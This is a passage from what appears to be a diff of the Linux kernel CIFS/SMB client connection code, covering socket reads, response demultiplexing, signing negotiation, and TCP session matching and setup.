++		if (cifs_rdma_enabled(server) && server->smbd_conn)
++			length = smbd_recv(server->smbd_conn, smb_msg);
++		else
++			length = sock_recvmsg(server->ssocket, smb_msg, 0);
++
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus == CifsExiting) {
++			spin_unlock(&server->srv_lock);
++			return -ESHUTDOWN;
++		}
++
++		if (server->tcpStatus == CifsNeedReconnect) {
++			spin_unlock(&server->srv_lock);
++			cifs_reconnect(server, false);
++			return -ECONNABORTED;
++		}
++		spin_unlock(&server->srv_lock);
++
++		if (length == -ERESTARTSYS ||
++		    length == -EAGAIN ||
++		    length == -EINTR) {
++			/*
++			 * Minimum sleep to prevent looping, allowing socket
++			 * to clear and app threads to set tcpStatus
++			 * CifsNeedReconnect if server hung.
++			 */
++			usleep_range(1000, 2000);
++			length = 0;
++			continue;
++		}
++
++		if (length <= 0) {
++			cifs_dbg(FYI, "Received no data or error: %d\n", length);
++			cifs_reconnect(server, false);
++			return -ECONNABORTED;
++		}
++	}
++	return total_read;
++}
++
++int
++cifs_read_from_socket(struct TCP_Server_Info *server, char *buf,
++		      unsigned int to_read)
++{
++	struct msghdr smb_msg = {};
++	struct kvec iov = {.iov_base = buf, .iov_len = to_read};
++	iov_iter_kvec(&smb_msg.msg_iter, ITER_DEST, &iov, 1, to_read);
++
++	return cifs_readv_from_socket(server, &smb_msg);
++}
++
++ssize_t
++cifs_discard_from_socket(struct TCP_Server_Info *server, size_t to_read)
++{
++	struct msghdr smb_msg = {};
++
++	/*
++	 *  iov_iter_discard already sets smb_msg.type and count and iov_offset
++	 *  and cifs_readv_from_socket sets msg_control and msg_controllen
++	 *  so little to initialize in struct msghdr
++	 */
++	iov_iter_discard(&smb_msg.msg_iter, ITER_DEST, to_read);
++
++	return cifs_readv_from_socket(server, &smb_msg);
++}
++
++int
++cifs_read_page_from_socket(struct TCP_Server_Info *server, struct page *page,
++	unsigned int page_offset, unsigned int to_read)
++{
++	struct msghdr smb_msg = {};
++	struct bio_vec bv = {
++		.bv_page = page, .bv_len = to_read, .bv_offset = page_offset};
++	iov_iter_bvec(&smb_msg.msg_iter, ITER_DEST, &bv, 1, to_read);
++	return cifs_readv_from_socket(server, &smb_msg);
++}
++
++static bool
++is_smb_response(struct TCP_Server_Info *server, unsigned char type)
++{
++	/*
++	 * The first byte big endian of the length field,
++	 * is actually not part of the length but the type
++	 * with the most common, zero, as regular data.
++	 */
++	switch (type) {
++	case RFC1002_SESSION_MESSAGE:
++		/* Regular SMB response */
++		return true;
++	case RFC1002_SESSION_KEEP_ALIVE:
++		cifs_dbg(FYI, "RFC 1002 session keep alive\n");
++		break;
++	case RFC1002_POSITIVE_SESSION_RESPONSE:
++		cifs_dbg(FYI, "RFC 1002 positive session response\n");
++		break;
++	case RFC1002_NEGATIVE_SESSION_RESPONSE:
++		/*
++		 * We get this from Windows 98 instead of an error on
++		 * SMB negprot response.
++		 */
++		cifs_dbg(FYI, "RFC 1002 negative session response\n");
++		/* give server a second to clean up */
++		msleep(1000);
++		/*
++		 * Always try 445 first on reconnect since we get NACK
++		 * on some if we ever connected to port 139 (the NACK
++		 * is since we do not begin with RFC1001 session
++		 * initialize frame).
++		 */
++		cifs_set_port((struct sockaddr *)&server->dstaddr, CIFS_PORT);
++		cifs_reconnect(server, true);
++		break;
++	default:
++		cifs_server_dbg(VFS, "RFC 1002 unknown response type 0x%x\n", type);
++		cifs_reconnect(server, true);
++	}
++
++	return false;
++}
++
++void
++dequeue_mid(struct mid_q_entry *mid, bool malformed)
++{
++#ifdef CONFIG_CIFS_STATS2
++	mid->when_received = jiffies;
++#endif
++	spin_lock(&mid->server->mid_lock);
++	if (!malformed)
++		mid->mid_state = MID_RESPONSE_RECEIVED;
++	else
++		mid->mid_state = MID_RESPONSE_MALFORMED;
++	/*
++	 * Trying to handle/dequeue a mid after the send_recv()
++	 * function has finished processing it is a bug.
++	 */
++	if (mid->mid_flags & MID_DELETED) {
++		spin_unlock(&mid->server->mid_lock);
++		pr_warn_once("trying to dequeue a deleted mid\n");
++	} else {
++		list_del_init(&mid->qhead);
++		mid->mid_flags |= MID_DELETED;
++		spin_unlock(&mid->server->mid_lock);
++	}
++}
++
++static unsigned int
++smb2_get_credits_from_hdr(char *buffer, struct TCP_Server_Info *server)
++{
++	struct smb2_hdr *shdr = (struct smb2_hdr *)buffer;
++
++	/*
++	 * SMB1 does not use credits.
++	 */
++	if (is_smb1(server))
++		return 0;
++
++	return le16_to_cpu(shdr->CreditRequest);
++}
++
++static void
++handle_mid(struct mid_q_entry *mid, struct TCP_Server_Info *server,
++	   char *buf, int malformed)
++{
++	if (server->ops->check_trans2 &&
++	    server->ops->check_trans2(mid, server, buf, malformed))
++		return;
++	mid->credits_received = smb2_get_credits_from_hdr(buf, server);
++	mid->resp_buf = buf;
++	mid->large_buf = server->large_buf;
++	/* Was previous buf put in mpx struct for multi-rsp? */
++	if (!mid->multiRsp) {
++		/* smb buffer will be freed by user thread */
++		if (server->large_buf)
++			server->bigbuf = NULL;
++		else
++			server->smallbuf = NULL;
++	}
++	dequeue_mid(mid, malformed);
++}
++
++int
++cifs_enable_signing(struct TCP_Server_Info *server, bool mnt_sign_required)
++{
++	bool srv_sign_required = server->sec_mode & server->vals->signing_required;
++	bool srv_sign_enabled = server->sec_mode & server->vals->signing_enabled;
++	bool mnt_sign_enabled;
++
++	/*
++	 * Is signing required by mnt options? If not then check
++	 * global_secflags to see if it is there.
++	 */
++	if (!mnt_sign_required)
++		mnt_sign_required = ((global_secflags & CIFSSEC_MUST_SIGN) ==
++						CIFSSEC_MUST_SIGN);
++
++	/*
++	 * If signing is required then it's automatically enabled too,
++	 * otherwise, check to see if the secflags allow it.
++	 */
++	mnt_sign_enabled = mnt_sign_required ? mnt_sign_required :
++				(global_secflags & CIFSSEC_MAY_SIGN);
++
++	/* If server requires signing, does client allow it? */
++	if (srv_sign_required) {
++		if (!mnt_sign_enabled) {
++			cifs_dbg(VFS, "Server requires signing, but it's disabled in SecurityFlags!\n");
++			return -EOPNOTSUPP;
++		}
++		server->sign = true;
++	}
++
++	/* If client requires signing, does server allow it? */
++	if (mnt_sign_required) {
++		if (!srv_sign_enabled) {
++			cifs_dbg(VFS, "Server does not support signing!\n");
++			return -EOPNOTSUPP;
++		}
++		server->sign = true;
++	}
++
++	if (cifs_rdma_enabled(server) && server->sign)
++		cifs_dbg(VFS, "Signing is enabled, and RDMA read/write will be disabled\n");
++
++	return 0;
++}
++
++
++static void clean_demultiplex_info(struct TCP_Server_Info *server)
++{
++	int length;
++
++	/* take it off the list, if it's not already */
++	spin_lock(&server->srv_lock);
++	list_del_init(&server->tcp_ses_list);
++	spin_unlock(&server->srv_lock);
++
++	cancel_delayed_work_sync(&server->echo);
++	cancel_delayed_work_sync(&server->resolve);
++
++	spin_lock(&server->srv_lock);
++	server->tcpStatus = CifsExiting;
++	spin_unlock(&server->srv_lock);
++	wake_up_all(&server->response_q);
++
++	/* check if we have blocked requests that need to free */
++	spin_lock(&server->req_lock);
++	if (server->credits <= 0)
++		server->credits = 1;
++	spin_unlock(&server->req_lock);
++	/*
++	 * Although there should not be any requests blocked on this queue it
++	 * can not hurt to be paranoid and try to wake up requests that may
++	 * haven been blocked when more than 50 at time were on the wire to the
++	 * same server - they now will see the session is in exit state and get
++	 * out of SendReceive.
++	 */
++	wake_up_all(&server->request_q);
++	/* give those requests time to exit */
++	msleep(125);
++	if (cifs_rdma_enabled(server))
++		smbd_destroy(server);
++	if (server->ssocket) {
++		sock_release(server->ssocket);
++		server->ssocket = NULL;
++	}
++
++	if (!list_empty(&server->pending_mid_q)) {
++		struct list_head dispose_list;
++		struct mid_q_entry *mid_entry;
++		struct list_head *tmp, *tmp2;
++
++		INIT_LIST_HEAD(&dispose_list);
++		spin_lock(&server->mid_lock);
++		list_for_each_safe(tmp, tmp2, &server->pending_mid_q) {
++			mid_entry = list_entry(tmp, struct mid_q_entry, qhead);
++			cifs_dbg(FYI, "Clearing mid %llu\n", mid_entry->mid);
++			kref_get(&mid_entry->refcount);
++			mid_entry->mid_state = MID_SHUTDOWN;
++			list_move(&mid_entry->qhead, &dispose_list);
++			mid_entry->mid_flags |= MID_DELETED;
++		}
++		spin_unlock(&server->mid_lock);
++
++		/* now walk dispose list and issue callbacks */
++		list_for_each_safe(tmp, tmp2, &dispose_list) {
++			mid_entry = list_entry(tmp, struct mid_q_entry, qhead);
++			cifs_dbg(FYI, "Callback mid %llu\n", mid_entry->mid);
++			list_del_init(&mid_entry->qhead);
++			mid_entry->callback(mid_entry);
++			release_mid(mid_entry);
++		}
++		/* 1/8th of sec is more than enough time for them to exit */
++		msleep(125);
++	}
++
++	if (!list_empty(&server->pending_mid_q)) {
++		/*
++		 * mpx threads have not exited yet give them at least the smb
++		 * send timeout time for long ops.
++		 *
++		 * Due to delays on oplock break requests, we need to wait at
++		 * least 45 seconds before giving up on a request getting a
++		 * response and going ahead and killing cifsd.
++		 */
++		cifs_dbg(FYI, "Wait for exit from demultiplex thread\n");
++		msleep(46000);
++		/*
++		 * If threads still have not exited they are probably never
++		 * coming home not much else we can do but free the memory.
++		 */
++	}
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	kfree(server->origin_fullpath);
++	kfree(server->leaf_fullpath);
++#endif
++	kfree(server);
++
++	length = atomic_dec_return(&tcpSesAllocCount);
++	if (length > 0)
++		mempool_resize(cifs_req_poolp, length + cifs_min_rcv);
++}
++
++static int
++standard_receive3(struct TCP_Server_Info *server, struct mid_q_entry *mid)
++{
++	int length;
++	char *buf = server->smallbuf;
++	unsigned int pdu_length = server->pdu_size;
++
++	/* make sure this will fit in a large buffer */
++	if (pdu_length > CIFSMaxBufSize + MAX_HEADER_SIZE(server) -
++	    HEADER_PREAMBLE_SIZE(server)) {
++		cifs_server_dbg(VFS, "SMB response too long (%u bytes)\n", pdu_length);
++		cifs_reconnect(server, true);
++		return -ECONNABORTED;
++	}
++
++	/* switch to large buffer if too big for a small one */
++	if (pdu_length > MAX_CIFS_SMALL_BUFFER_SIZE - 4) {
++		server->large_buf = true;
++		memcpy(server->bigbuf, buf, server->total_read);
++		buf = server->bigbuf;
++	}
++
++	/* now read the rest */
++	length = cifs_read_from_socket(server, buf + HEADER_SIZE(server) - 1,
++				       pdu_length - MID_HEADER_SIZE(server));
++
++	if (length < 0)
++		return length;
++	server->total_read += length;
++
++	dump_smb(buf, server->total_read);
++
++	return cifs_handle_standard(server, mid);
++}
++
++int
++cifs_handle_standard(struct TCP_Server_Info *server, struct mid_q_entry *mid)
++{
++	char *buf = server->large_buf ? server->bigbuf : server->smallbuf;
++	int rc;
++
++	/*
++	 * We know that we received enough to get to the MID as we
++	 * checked the pdu_length earlier. Now check to see
++	 * if the rest of the header is OK.
++	 *
++	 * 48 bytes is enough to display the header and a little bit
++	 * into the payload for debugging purposes.
++	 */
++	rc = server->ops->check_message(buf, server->total_read, server);
++	if (rc)
++		cifs_dump_mem("Bad SMB: ", buf,
++			min_t(unsigned int, server->total_read, 48));
++
++	if (server->ops->is_session_expired &&
++	    server->ops->is_session_expired(buf)) {
++		cifs_reconnect(server, true);
++		return -1;
++	}
++
++	if (server->ops->is_status_pending &&
++	    server->ops->is_status_pending(buf, server))
++		return -1;
++
++	if (!mid)
++		return rc;
++
++	handle_mid(mid, server, buf, rc);
++	return 0;
++}
++
++static void
++smb2_add_credits_from_hdr(char *buffer, struct TCP_Server_Info *server)
++{
++	struct smb2_hdr *shdr = (struct smb2_hdr *)buffer;
++	int scredits, in_flight;
++
++	/*
++	 * SMB1 does not use credits.
++	 */
++	if (is_smb1(server))
++		return;
++
++	if (shdr->CreditRequest) {
++		spin_lock(&server->req_lock);
++		server->credits += le16_to_cpu(shdr->CreditRequest);
++		scredits = server->credits;
++		in_flight = server->in_flight;
++		spin_unlock(&server->req_lock);
++		wake_up(&server->request_q);
++
++		trace_smb3_hdr_credits(server->CurrentMid,
++				server->conn_id, server->hostname, scredits,
++				le16_to_cpu(shdr->CreditRequest), in_flight);
++		cifs_server_dbg(FYI, "%s: added %u credits total=%d\n",
++				__func__, le16_to_cpu(shdr->CreditRequest),
++				scredits);
++	}
++}
++
++
++static int
++cifs_demultiplex_thread(void *p)
++{
++	int i, num_mids, length;
++	struct TCP_Server_Info *server = p;
++	unsigned int pdu_length;
++	unsigned int next_offset;
++	char *buf = NULL;
++	struct task_struct *task_to_wake = NULL;
++	struct mid_q_entry *mids[MAX_COMPOUND];
++	char *bufs[MAX_COMPOUND];
++	unsigned int noreclaim_flag, num_io_timeout = 0;
++
++	noreclaim_flag = memalloc_noreclaim_save();
++	cifs_dbg(FYI, "Demultiplex PID: %d\n", task_pid_nr(current));
++
++	length = atomic_inc_return(&tcpSesAllocCount);
++	if (length > 1)
++		mempool_resize(cifs_req_poolp, length + cifs_min_rcv);
++
++	set_freezable();
++	allow_kernel_signal(SIGKILL);
++	while (server->tcpStatus != CifsExiting) {
++		if (try_to_freeze())
++			continue;
++
++		if (!allocate_buffers(server))
++			continue;
++
++		server->large_buf = false;
++		buf = server->smallbuf;
++		pdu_length = 4; /* enough to get RFC1001 header */
++
++		length = cifs_read_from_socket(server, buf, pdu_length);
++		if (length < 0)
++			continue;
++
++		if (is_smb1(server))
++			server->total_read = length;
++		else
++			server->total_read = 0;
++
++		/*
++		 * The right amount was read from socket - 4 bytes,
++		 * so we can now interpret the length field.
++		 */
++		pdu_length = get_rfc1002_length(buf);
++
++		cifs_dbg(FYI, "RFC1002 header 0x%x\n", pdu_length);
++		if (!is_smb_response(server, buf[0]))
++			continue;
++next_pdu:
++		server->pdu_size = pdu_length;
++
++		/* make sure we have enough to get to the MID */
++		if (server->pdu_size < MID_HEADER_SIZE(server)) {
++			cifs_server_dbg(VFS, "SMB response too short (%u bytes)\n",
++				 server->pdu_size);
++			cifs_reconnect(server, true);
++			continue;
++		}
++
++		/* read down to the MID */
++		length = cifs_read_from_socket(server,
++			     buf + HEADER_PREAMBLE_SIZE(server),
++			     MID_HEADER_SIZE(server));
++		if (length < 0)
++			continue;
++		server->total_read += length;
++
++		if (server->ops->next_header) {
++			next_offset = server->ops->next_header(buf);
++			if (next_offset)
++				server->pdu_size = next_offset;
++		}
++
++		memset(mids, 0, sizeof(mids));
++		memset(bufs, 0, sizeof(bufs));
++		num_mids = 0;
++
++		if (server->ops->is_transform_hdr &&
++		    server->ops->receive_transform &&
++		    server->ops->is_transform_hdr(buf)) {
++			length = server->ops->receive_transform(server,
++								mids,
++								bufs,
++								&num_mids);
++		} else {
++			mids[0] = server->ops->find_mid(server, buf);
++			bufs[0] = buf;
++			num_mids = 1;
++
++			if (!mids[0] || !mids[0]->receive)
++				length = standard_receive3(server, mids[0]);
++			else
++				length = mids[0]->receive(server, mids[0]);
++		}
++
++		if (length < 0) {
++			for (i = 0; i < num_mids; i++)
++				if (mids[i])
++					release_mid(mids[i]);
++			continue;
++		}
++
++		if (server->ops->is_status_io_timeout &&
++		    server->ops->is_status_io_timeout(buf)) {
++			num_io_timeout++;
++			if (num_io_timeout > NUM_STATUS_IO_TIMEOUT) {
++				cifs_reconnect(server, false);
++				num_io_timeout = 0;
++				continue;
++			}
++		}
++
++		server->lstrp = jiffies;
++
++		for (i = 0; i < num_mids; i++) {
++			if (mids[i] != NULL) {
++				mids[i]->resp_buf_size = server->pdu_size;
++
++				if (bufs[i] && server->ops->is_network_name_deleted)
++					server->ops->is_network_name_deleted(bufs[i],
++									server);
++
++				if (!mids[i]->multiRsp || mids[i]->multiEnd)
++					mids[i]->callback(mids[i]);
++
++				release_mid(mids[i]);
++			} else if (server->ops->is_oplock_break &&
++				   server->ops->is_oplock_break(bufs[i],
++								server)) {
++				smb2_add_credits_from_hdr(bufs[i], server);
++				cifs_dbg(FYI, "Received oplock break\n");
++			} else {
++				cifs_server_dbg(VFS, "No task to wake, unknown frame received! NumMids %d\n",
++						atomic_read(&mid_count));
++				cifs_dump_mem("Received Data is: ", bufs[i],
++					      HEADER_SIZE(server));
++				smb2_add_credits_from_hdr(bufs[i], server);
++#ifdef CONFIG_CIFS_DEBUG2
++				if (server->ops->dump_detail)
++					server->ops->dump_detail(bufs[i],
++								 server);
++				cifs_dump_mids(server);
++#endif /* CIFS_DEBUG2 */
++			}
++		}
++
++		if (pdu_length > server->pdu_size) {
++			if (!allocate_buffers(server))
++				continue;
++			pdu_length -= server->pdu_size;
++			server->total_read = 0;
++			server->large_buf = false;
++			buf = server->smallbuf;
++			goto next_pdu;
++		}
++	} /* end while !EXITING */
++
++	/* buffer usually freed in free_mid - need to free it here on exit */
++	cifs_buf_release(server->bigbuf);
++	if (server->smallbuf) /* no sense logging a debug message if NULL */
++		cifs_small_buf_release(server->smallbuf);
++
++	task_to_wake = xchg(&server->tsk, NULL);
++	clean_demultiplex_info(server);
++
++	/* if server->tsk was NULL then wait for a signal before exiting */
++	if (!task_to_wake) {
++		set_current_state(TASK_INTERRUPTIBLE);
++		while (!signal_pending(current)) {
++			schedule();
++			set_current_state(TASK_INTERRUPTIBLE);
++		}
++		set_current_state(TASK_RUNNING);
++	}
++
++	memalloc_noreclaim_restore(noreclaim_flag);
++	module_put_and_kthread_exit(0);
++}
++
++/*
++ * Returns true if srcaddr isn't specified and rhs isn't specified, or
++ * if srcaddr is specified and matches the IP address of the rhs argument
++ */
++bool
++cifs_match_ipaddr(struct sockaddr *srcaddr, struct sockaddr *rhs)
++{
++	switch (srcaddr->sa_family) {
++	case AF_UNSPEC:
++		return (rhs->sa_family == AF_UNSPEC);
++	case AF_INET: {
++		struct sockaddr_in *saddr4 = (struct sockaddr_in *)srcaddr;
++		struct sockaddr_in *vaddr4 = (struct sockaddr_in *)rhs;
++		return (saddr4->sin_addr.s_addr == vaddr4->sin_addr.s_addr);
++	}
++	case AF_INET6: {
++		struct sockaddr_in6 *saddr6 = (struct sockaddr_in6 *)srcaddr;
++		struct sockaddr_in6 *vaddr6 = (struct sockaddr_in6 *)rhs;
++		return ipv6_addr_equal(&saddr6->sin6_addr, &vaddr6->sin6_addr);
++	}
++	default:
++		WARN_ON(1);
++		return false; /* don't expect to be here */
++	}
++}
++
++/*
++ * If no port is specified in addr structure, we try to match with 445 port
++ * and if it fails - with 139 ports. It should be called only if address
++ * families of server and addr are equal.
++ */
++static bool
++match_port(struct TCP_Server_Info *server, struct sockaddr *addr)
++{
++	__be16 port, *sport;
++
++	/* SMBDirect manages its own ports, don't match it here */
++	if (server->rdma)
++		return true;
++
++	switch (addr->sa_family) {
++	case AF_INET:
++		sport = &((struct sockaddr_in *) &server->dstaddr)->sin_port;
++		port = ((struct sockaddr_in *) addr)->sin_port;
++		break;
++	case AF_INET6:
++		sport = &((struct sockaddr_in6 *) &server->dstaddr)->sin6_port;
++		port = ((struct sockaddr_in6 *) addr)->sin6_port;
++		break;
++	default:
++		WARN_ON(1);
++		return false;
++	}
++
++	if (!port) {
++		port = htons(CIFS_PORT);
++		if (port == *sport)
++			return true;
++
++		port = htons(RFC1001_PORT);
++	}
++
++	return port == *sport;
++}
++
++static bool
++match_address(struct TCP_Server_Info *server, struct sockaddr *addr,
++	      struct sockaddr *srcaddr)
++{
++	switch (addr->sa_family) {
++	case AF_INET: {
++		struct sockaddr_in *addr4 = (struct sockaddr_in *)addr;
++		struct sockaddr_in *srv_addr4 =
++					(struct sockaddr_in *)&server->dstaddr;
++
++		if (addr4->sin_addr.s_addr != srv_addr4->sin_addr.s_addr)
++			return false;
++		break;
++	}
++	case AF_INET6: {
++		struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)addr;
++		struct sockaddr_in6 *srv_addr6 =
++					(struct sockaddr_in6 *)&server->dstaddr;
++
++		if (!ipv6_addr_equal(&addr6->sin6_addr,
++				     &srv_addr6->sin6_addr))
++			return false;
++		if (addr6->sin6_scope_id != srv_addr6->sin6_scope_id)
++			return false;
++		break;
++	}
++	default:
++		WARN_ON(1);
++		return false; /* don't expect to be here */
++	}
++
++	if (!cifs_match_ipaddr(srcaddr, (struct sockaddr *)&server->srcaddr))
++		return false;
++
++	return true;
++}
++
++static bool
++match_security(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
++{
++	/*
++	 * The select_sectype function should either return the ctx->sectype
++	 * that was specified, or "Unspecified" if that sectype was not
++	 * compatible with the given NEGOTIATE request.
++	 */
++	if (server->ops->select_sectype(server, ctx->sectype)
++	     == Unspecified)
++		return false;
++
++	/*
++	 * Now check if signing mode is acceptable. No need to check
++	 * global_secflags at this point since if MUST_SIGN is set then
++	 * the server->sign had better be too.
++	 */
++	if (ctx->sign && !server->sign)
++		return false;
++
++	return true;
++}
++
++/* this function must be called with srv_lock held */
++static int match_server(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
++{
++	struct sockaddr *addr = (struct sockaddr *)&ctx->dstaddr;
++
++	lockdep_assert_held(&server->srv_lock);
++
++	if (ctx->nosharesock)
++		return 0;
++
++	/* this server does not share socket */
++	if (server->nosharesock)
++		return 0;
++
++	/* If multidialect negotiation see if existing sessions match one */
++	if (strcmp(ctx->vals->version_string, SMB3ANY_VERSION_STRING) == 0) {
++		if (server->vals->protocol_id < SMB30_PROT_ID)
++			return 0;
++	} else if (strcmp(ctx->vals->version_string,
++		   SMBDEFAULT_VERSION_STRING) == 0) {
++		if (server->vals->protocol_id < SMB21_PROT_ID)
++			return 0;
++	} else if ((server->vals != ctx->vals) || (server->ops != ctx->ops))
++		return 0;
++
++	if (!net_eq(cifs_net_ns(server), current->nsproxy->net_ns))
++		return 0;
++
++	if (strcasecmp(server->hostname, ctx->server_hostname))
++		return 0;
++
++	if (!match_address(server, addr,
++			   (struct sockaddr *)&ctx->srcaddr))
++		return 0;
++
++	if (!match_port(server, addr))
++		return 0;
++
++	if (!match_security(server, ctx))
++		return 0;
++
++	if (server->echo_interval != ctx->echo_interval * HZ)
++		return 0;
++
++	if (server->rdma != ctx->rdma)
++		return 0;
++
++	if (server->ignore_signature != ctx->ignore_signature)
++		return 0;
++
++	if (server->min_offload != ctx->min_offload)
++		return 0;
++
++	return 1;
++}
++
++struct TCP_Server_Info *
++cifs_find_tcp_session(struct smb3_fs_context *ctx)
++{
++	struct TCP_Server_Info *server;
++
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
++		spin_lock(&server->srv_lock);
++#ifdef CONFIG_CIFS_DFS_UPCALL
++		/*
++		 * DFS failover implementation in cifs_reconnect() requires unique tcp sessions for
++		 * DFS connections to do failover properly, so avoid sharing them with regular
++		 * shares or even links that may connect to same server but having completely
++		 * different failover targets.
++		 */
++		if (server->is_dfs_conn) {
++			spin_unlock(&server->srv_lock);
++			continue;
++		}
++#endif
++		/*
++		 * Skip ses channels since they're only handled in lower layers
++		 * (e.g. cifs_send_recv).
++		 */
++		if (CIFS_SERVER_IS_CHAN(server) || !match_server(server, ctx)) {
++			spin_unlock(&server->srv_lock);
++			continue;
++		}
++		spin_unlock(&server->srv_lock);
++
++		++server->srv_count;
++		spin_unlock(&cifs_tcp_ses_lock);
++		cifs_dbg(FYI, "Existing tcp session with server found\n");
++		return server;
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++	return NULL;
++}
++
++void
++cifs_put_tcp_session(struct TCP_Server_Info *server, int from_reconnect)
++{
++	struct task_struct *task;
++
++	spin_lock(&cifs_tcp_ses_lock);
++	if (--server->srv_count > 0) {
++		spin_unlock(&cifs_tcp_ses_lock);
++		return;
++	}
++
++	/* srv_count can never go negative */
++	WARN_ON(server->srv_count < 0);
++
++	put_net(cifs_net_ns(server));
++
++	list_del_init(&server->tcp_ses_list);
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	/* For secondary channels, we pick up ref-count on the primary server */
++	if (CIFS_SERVER_IS_CHAN(server))
++		cifs_put_tcp_session(server->primary_server, from_reconnect);
++
++	cancel_delayed_work_sync(&server->echo);
++	cancel_delayed_work_sync(&server->resolve);
++
++	if (from_reconnect)
++		/*
++		 * Avoid deadlock here: reconnect work calls
++		 * cifs_put_tcp_session() at its end. Need to be sure
++		 * that reconnect work does nothing with server pointer after
++		 * that step.
++		 */
++		cancel_delayed_work(&server->reconnect);
++	else
++		cancel_delayed_work_sync(&server->reconnect);
++
++	spin_lock(&server->srv_lock);
++	server->tcpStatus = CifsExiting;
++	spin_unlock(&server->srv_lock);
++
++	cifs_crypto_secmech_release(server);
++
++	kfree_sensitive(server->session_key.response);
++	server->session_key.response = NULL;
++	server->session_key.len = 0;
++	kfree(server->hostname);
++	server->hostname = NULL;
++
++	task = xchg(&server->tsk, NULL);
++	if (task)
++		send_sig(SIGKILL, task, 1);
++}
++
++struct TCP_Server_Info *
++cifs_get_tcp_session(struct smb3_fs_context *ctx,
++		     struct TCP_Server_Info *primary_server)
++{
++	struct TCP_Server_Info *tcp_ses = NULL;
++	int rc;
++
++	cifs_dbg(FYI, "UNC: %s\n", ctx->UNC);
++
++	/* see if we already have a matching tcp_ses */
++	tcp_ses = cifs_find_tcp_session(ctx);
++	if (tcp_ses)
++		return tcp_ses;
++
++	tcp_ses = kzalloc(sizeof(struct TCP_Server_Info), GFP_KERNEL);
++	if (!tcp_ses) {
++		rc = -ENOMEM;
++		goto out_err;
++	}
++
++	tcp_ses->hostname = kstrdup(ctx->server_hostname, GFP_KERNEL);
++	if (!tcp_ses->hostname) {
++		rc = -ENOMEM;
++		goto out_err;
++	}
++
++	if (ctx->nosharesock)
++		tcp_ses->nosharesock = true;
++
++	tcp_ses->ops = ctx->ops;
++	tcp_ses->vals = ctx->vals;
++	cifs_set_net_ns(tcp_ses, get_net(current->nsproxy->net_ns));
++
++	tcp_ses->conn_id = atomic_inc_return(&tcpSesNextId);
++	tcp_ses->noblockcnt = ctx->rootfs;
++	tcp_ses->noblocksnd = ctx->noblocksnd || ctx->rootfs;
++	tcp_ses->noautotune = ctx->noautotune;
++	tcp_ses->tcp_nodelay = ctx->sockopt_tcp_nodelay;
++	tcp_ses->rdma = ctx->rdma;
++	tcp_ses->in_flight = 0;
++	tcp_ses->max_in_flight = 0;
++	tcp_ses->credits = 1;
++	if (primary_server) {
++		spin_lock(&cifs_tcp_ses_lock);
++		++primary_server->srv_count;
++		spin_unlock(&cifs_tcp_ses_lock);
++		tcp_ses->primary_server = primary_server;
++	}
++	init_waitqueue_head(&tcp_ses->response_q);
++	init_waitqueue_head(&tcp_ses->request_q);
++	INIT_LIST_HEAD(&tcp_ses->pending_mid_q);
++	mutex_init(&tcp_ses->_srv_mutex);
++	memcpy(tcp_ses->workstation_RFC1001_name,
++		ctx->source_rfc1001_name, RFC1001_NAME_LEN_WITH_NULL);
++	memcpy(tcp_ses->server_RFC1001_name,
++		ctx->target_rfc1001_name, RFC1001_NAME_LEN_WITH_NULL);
++	tcp_ses->session_estab = false;
++	tcp_ses->sequence_number = 0;
++	tcp_ses->reconnect_instance = 1;
++	tcp_ses->lstrp = jiffies;
++	tcp_ses->compress_algorithm = cpu_to_le16(ctx->compression);
++	spin_lock_init(&tcp_ses->req_lock);
++	spin_lock_init(&tcp_ses->srv_lock);
++	spin_lock_init(&tcp_ses->mid_lock);
++	INIT_LIST_HEAD(&tcp_ses->tcp_ses_list);
++	INIT_LIST_HEAD(&tcp_ses->smb_ses_list);
++	INIT_DELAYED_WORK(&tcp_ses->echo, cifs_echo_request);
++	INIT_DELAYED_WORK(&tcp_ses->resolve, cifs_resolve_server);
++	INIT_DELAYED_WORK(&tcp_ses->reconnect, smb2_reconnect_server);
++	mutex_init(&tcp_ses->reconnect_mutex);
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	mutex_init(&tcp_ses->refpath_lock);
++#endif
++	memcpy(&tcp_ses->srcaddr, &ctx->srcaddr,
++	       sizeof(tcp_ses->srcaddr));
++	memcpy(&tcp_ses->dstaddr, &ctx->dstaddr,
++		sizeof(tcp_ses->dstaddr));
++	if (ctx->use_client_guid)
++		memcpy(tcp_ses->client_guid, ctx->client_guid,
++		       SMB2_CLIENT_GUID_SIZE);
++	else
++		generate_random_uuid(tcp_ses->client_guid);
++	/*
++	 * at this point we are the only ones with the pointer
++	 * to the struct since the kernel thread not created yet
++	 * no need to spinlock this init of tcpStatus or srv_count
++	 */
++	tcp_ses->tcpStatus = CifsNew;
++	++tcp_ses->srv_count;
++
++	if (ctx->echo_interval >= SMB_ECHO_INTERVAL_MIN &&
++		ctx->echo_interval <= SMB_ECHO_INTERVAL_MAX)
++		tcp_ses->echo_interval = ctx->echo_interval * HZ;
++	else
++		tcp_ses->echo_interval = SMB_ECHO_INTERVAL_DEFAULT * HZ;
++	if (tcp_ses->rdma) {
++#ifndef CONFIG_CIFS_SMB_DIRECT
++		cifs_dbg(VFS, "CONFIG_CIFS_SMB_DIRECT is not enabled\n");
++		rc = -ENOENT;
++		goto out_err_crypto_release;
++#endif
++		tcp_ses->smbd_conn = smbd_get_connection(
++			tcp_ses, (struct sockaddr *)&ctx->dstaddr);
++		if (tcp_ses->smbd_conn) {
++			cifs_dbg(VFS, "RDMA transport established\n");
++			rc = 0;
++			goto smbd_connected;
++		} else {
++			rc = -ENOENT;
++			goto out_err_crypto_release;
++		}
++	}
++	rc = ip_connect(tcp_ses);
++	if (rc < 0) {
++		cifs_dbg(VFS, "Error connecting to socket. Aborting operation.\n");
++		goto out_err_crypto_release;
++	}
++smbd_connected:
++	/*
++	 * since we're in a cifs function already, we know that
++	 * this will succeed. No need for try_module_get().
++	 */
++	__module_get(THIS_MODULE);
++	tcp_ses->tsk = kthread_run(cifs_demultiplex_thread,
++				  tcp_ses, "cifsd");
++	if (IS_ERR(tcp_ses->tsk)) {
++		rc = PTR_ERR(tcp_ses->tsk);
++		cifs_dbg(VFS, "error %d create cifsd thread\n", rc);
